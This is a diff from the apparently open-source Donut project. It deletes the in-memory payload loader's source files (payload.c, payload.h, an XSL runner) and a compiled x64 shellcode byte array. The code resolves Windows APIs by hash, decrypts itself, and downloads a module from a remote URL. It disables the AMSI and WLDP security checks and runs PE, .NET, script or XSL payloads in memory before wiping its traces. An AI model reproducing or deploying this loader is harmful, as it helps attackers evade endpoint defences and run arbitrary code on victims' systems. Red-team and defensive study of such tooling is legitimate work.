51 xsl_str = (PWCHAR)inst->api.VirtualAlloc(
52 NULL,
53 (inst->mod_len + 1) * sizeof(WCHAR),
54 MEM_COMMIT | MEM_RESERVE,
55 PAGE_READWRITE);
56
57 if(xsl_str != NULL) {
58 // 2. Convert string to unicode.
59 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
60 -1, xsl_str, mod->len * sizeof(WCHAR));
61
62 // 3. Initialize COM
63 DPRINT("CoInitializeEx");
64 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
65
66 if(hr == S_OK) {
67 // 4. Instantiate XMLDOMDocument object
68 DPRINT("CoCreateInstance");
69 hr = inst->api.CoCreateInstance(
70 &inst->xCLSID_DOMDocument30,
71 NULL, CLSCTX_INPROC_SERVER,
72 &inst->xIID_IXMLDOMDocument,
73 (void**)&pDoc);
74
75 if(hr == S_OK) {
76 // 5. load XSL file
77 DPRINT("IXMLDOMDocument::loadXML");
78 hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
79 DPRINT("HRESULT: %08lx loaded : %s",
80 hr, loaded ? "TRUE" : "FALSE");
81
82 if(hr == S_OK && loaded) {
83 // 6. query node interface
84 DPRINT("IXMLDOMDocument::QueryInterface");
85 hr = pDoc->lpVtbl->QueryInterface(
86 pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
87
88 if(hr == S_OK) {
89 DPRINT("HRESULT: %08lx", hr);
90 // 7. execute script
91 DPRINT("IXMLDOMDocument::transformNode");
92 hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
93 DPRINT("HRESULT: %08lx", hr);
94 pNode->lpVtbl->Release(pNode);
95 }
96 }
97 pDoc->lpVtbl->Release(pDoc);
98 }
99 DPRINT("CoUninitialize");
100 inst->api.CoUninitialize();
101 }
102 DPRINT("Erasing XSL from memory.");
103 Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
104
105 DPRINT("VirtualFree()");
106 inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
107 }
108 }
+0
-1
payload/order.txt less more
0 ThreadProc
+0
-267
payload/payload.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "payload.h"
32
33 DWORD ThreadProc(LPVOID lpParameter) {
34 ULONG i, ofs;
35 ULONG64 sig;
36 PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
37 DONUT_ASSEMBLY assembly;
38 PDONUT_MODULE mod;
39 VirtualAlloc_t _VirtualAlloc;
40 VirtualFree_t _VirtualFree;
41 LPVOID pv;
42 ULONG64 hash;
43 BOOL disabled;
44
45 DPRINT("Maru IV : %" PRIX64, inst->iv);
46
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
49 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
50
51 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
52 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
53 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
54
55 if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
56 DPRINT("FAILED!.");
57 return -1;
58 }
59
60 DPRINT("VirtualAlloc : %p VirtualFree : %p",
61 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
62
63 DPRINT("Allocating %i bytes of RW memory", inst->len);
64 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65
66 if(pv == NULL) {
67 DPRINT("Memory allocation failed...");
68 return -1;
69 }
70 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
71 Memcpy(pv, lpParameter, inst->len);
72 inst = (PDONUT_INSTANCE)pv;
73
74 DPRINT("Zero initializing PDONUT_ASSEMBLY");
75 Memset(&assembly, 0, sizeof(assembly));
76
77 #if !defined(NOCRYPTO)
78 PBYTE inst_data;
79 // load pointer to data just past len + key
80 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
81
82 DPRINT("Decrypting %li bytes of instance", inst->len);
83
84 donut_decrypt(inst->key.mk,
85 inst->key.ctr,
86 inst_data,
87 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
88
89 DPRINT("Generating hash to verify decryption");
90 ULONG64 mac = maru(inst->sig, inst->iv);
91 DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
92
93 if(mac != inst->mac) {
94 DPRINT("Decryption of instance failed");
95 goto erase_memory;
96 }
97 #endif
98 DPRINT("Resolving LoadLibraryA");
99
100 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
101 if(inst->api.addr[0] == NULL) return -1;
102
103 for(i=0; i<inst->dll_cnt; i++) {
104 DPRINT("Loading %s ...", inst->dll_name[i]);
105 inst->api.LoadLibraryA(inst->dll_name[i]);
106 }
107
108 DPRINT("Resolving %i API", inst->api_cnt);
109
110 for(i=1; i<inst->api_cnt; i++) {
111 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
112
113 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
114
115 if(inst->api.addr[i] == NULL) {
116 DPRINT("Failed to resolve API");
117 goto erase_memory;
118 }
119 }
120
121 if(inst->type == DONUT_INSTANCE_URL) {
122 DPRINT("Instance is URL");
123 if(!DownloadModule(inst)) goto erase_memory;
124 }
125
126 if(inst->type == DONUT_INSTANCE_PIC) {
127 DPRINT("Using module embedded in instance");
128 mod = (PDONUT_MODULE)&inst->module.x;
129 } else {
130 DPRINT("Loading module from allocated memory");
131 mod = inst->module.p;
132 }
133
134 // try bypassing AMSI and WLDP?
135 if(inst->bypass != DONUT_BYPASS_SKIP) {
136 // Try to disable AMSI
137 disabled = DisableAMSI(inst);
138 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
139 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
140 goto erase_memory;
141
142 // Try to disable WLDP
143 disabled = DisableWLDP(inst);
144 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
145 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
146 goto erase_memory;
147 }
148
149 // unmanaged EXE/DLL?
150 if(mod->type == DONUT_MODULE_DLL ||
151 mod->type == DONUT_MODULE_EXE) {
152 RunPE(inst);
153 } else
154 // .NET EXE/DLL?
155 if(mod->type == DONUT_MODULE_NET_DLL ||
156 mod->type == DONUT_MODULE_NET_EXE)
157 {
158 if(LoadAssembly(inst, &assembly)) {
159 RunAssembly(inst, &assembly);
160 }
161 FreeAssembly(inst, &assembly);
162 } else
163 // vbs or js?
164 if(mod->type == DONUT_MODULE_VBS ||
165 mod->type == DONUT_MODULE_JS)
166 {
167 RunScript(inst);
168 } else
169 // xsl?
170 if(mod->type == DONUT_MODULE_XSL) {
171 RunXSL(inst);
172 }
173
174 erase_memory:
175 // if module was downloaded
176 if(inst->type == DONUT_INSTANCE_URL) {
177 if(inst->module.p != NULL) {
178 // overwrite memory with zeros
179 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
180
181 // free memory
182 inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
183 inst->module.p = NULL;
184 }
185 }
186
187 DPRINT("Erasing RW memory for instance");
188 Memset(inst, 0, inst->len);
189
190 DPRINT("Releasing RW memory for instance");
191 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
192
193 return 0;
194 }
195
196 #include "http_client.c" // For downloading module
197
198 #include "inmem_dotnet.c" // .NET assemblies
199 #include "inmem_pe.c" // Unmanaged PE/DLL files
200 #include "inmem_xsl.c" // XSL files
201 #include "inmem_script.c" // VBS/JS files
202
203 #include "peb.c" // resolve functions in export table
204
205 #include "bypass.c" // Bypass AMSI and WLDP
206 #include "getpc.c" // code stub to return program counter (always at the end!)
207
208 // the following code is *only* for development purposes
209 // given an instance file, it will run as if running on a target system
210 // attach a debugger to host process
211 #ifdef DEBUG
212
213 #include <stdio.h>
214 #include <string.h>
215 #include <stdlib.h>
216 #include <sys/stat.h>
217
218 int main(int argc, char *argv[]) {
219 FILE *fd;
220 struct stat fs;
221 PDONUT_INSTANCE inst;
222 DWORD old;
223
224 if(argc != 2) {
225 printf(" [ usage: payload <instance>\n");
226 return 0;
227 }
228 // get size of instance
229 if(stat(argv[1], &fs) != 0) {
230 printf(" [ unable to obtain size of instance.\n");
231 return 0;
232 }
233
234 // zero size?
235 if(fs.st_size == 0) {
236 printf(" [ invalid instance.\n");
237 return 0;
238 }
239
240 // try open for reading
241 fd = fopen(argv[1], "rb");
242 if(fd == NULL) {
243 printf(" [ unable to open %s.\n", argv[1]);
244 return 0;
245 }
246
247 // allocate memory
248 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
249
250 if(inst != NULL) {
251 fread(inst, 1, fs.st_size, fd);
252
253 // change protection to PAGE_EXECUTE_READ
254 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
255 printf("Running...");
256
257 // run payload with instance
258 ThreadProc(inst);
259 }
260 // deallocate
261 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
262 }
263 fclose(fd);
264 return 0;
265 }
266 #endif
+0
-145
payload/payload.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PAYLOAD_H
32 #define PAYLOAD_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45
46 #pragma comment(lib, "wininet.lib")
47 #pragma comment(lib, "advapi32.lib")
48 #pragma comment(lib, "crypt32.lib")
49
50 #if defined(DEBUG)
51 #include <stdio.h>
52 #include <string.h>
53
54 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
55
56 #define DPRINT(...) { \
57 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
58 fprintf(stderr, __VA_ARGS__); \
59 }
60 #else
61 #define DPRINT(...) // Don't do anything in release builds
62 #endif
63
64 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
65 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
66 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
67
68 // Relative Virtual Address to Virtual Address
69 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
70
71 #if defined(_M_IX86) || defined(__i386__)
72 // return pointer to code in memory
73 char *get_pc(void);
74
75 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
76 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
77 #else
78 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
79 #endif
80
81 void *Memset(void *ptr, int value, size_t num);
82 void *Memcpy(void *destination, const void *source, size_t num);
83 int Memcmp(const void *ptr1, const void *ptr2, size_t num);
84
85 #if !defined(_MSC_VER)
86 #define memcmp(x,y,z) Memcmp(x,y,z)
87 #endif
88
89 #include "peb.h" // Process Environment Block
90 #include "winapi.h" // Prototypes
91 #include "clr.h" // Common Language Runtime Interface
92
93 #include "donut.h"
94
95 #include "amsi.h" // Anti-malware Scan Interface
96 #include "activescript.h" // Interfaces for executing VBS/JS files
97 #include "wscript.h" // Interfaces to support WScript object
98
99 typedef struct {
100 IActiveScriptSite site;
101 IActiveScriptSiteWindow siteWnd;
102 IHost wscript;
103 HANDLE hEvent;
104 PDONUT_INSTANCE inst; //
105 } MyIActiveScriptSite;
106
107 // internal structure
108 typedef struct _DONUT_ASSEMBLY {
109 ICLRMetaHost *icmh;
110 ICLRRuntimeInfo *icri;
111 ICorRuntimeHost *icrh;
112 IUnknown *iu;
113 AppDomain *ad;
114 Assembly *as;
115 Type *type;
116 MethodInfo *mi;
117 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
118
119 // Downloads a module from remote HTTP server into memory
120 BOOL DownloadModule(PDONUT_INSTANCE);
121
122 // .NET DLL/EXE
123 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
124 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
125 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
126
127 // Extensible Stylesheet Language Transformations
128 VOID RunXSL(PDONUT_INSTANCE);
129
130 // In-Memory execution of native DLL
131 VOID RunPE(PDONUT_INSTANCE);
132
133 // VBS / JS files
134 VOID RunScript(PDONUT_INSTANCE);
135
136 // Disables Antimalware Scan Interface
137 BOOL DisableAMSI(PDONUT_INSTANCE);
138
139 // Disables Windows Lockdown Policy
140 BOOL DisableWLDP(PDONUT_INSTANCE);
141
142 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
143
144 #endif
+0
-1361
payload/payload_exe_x64.h less more
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
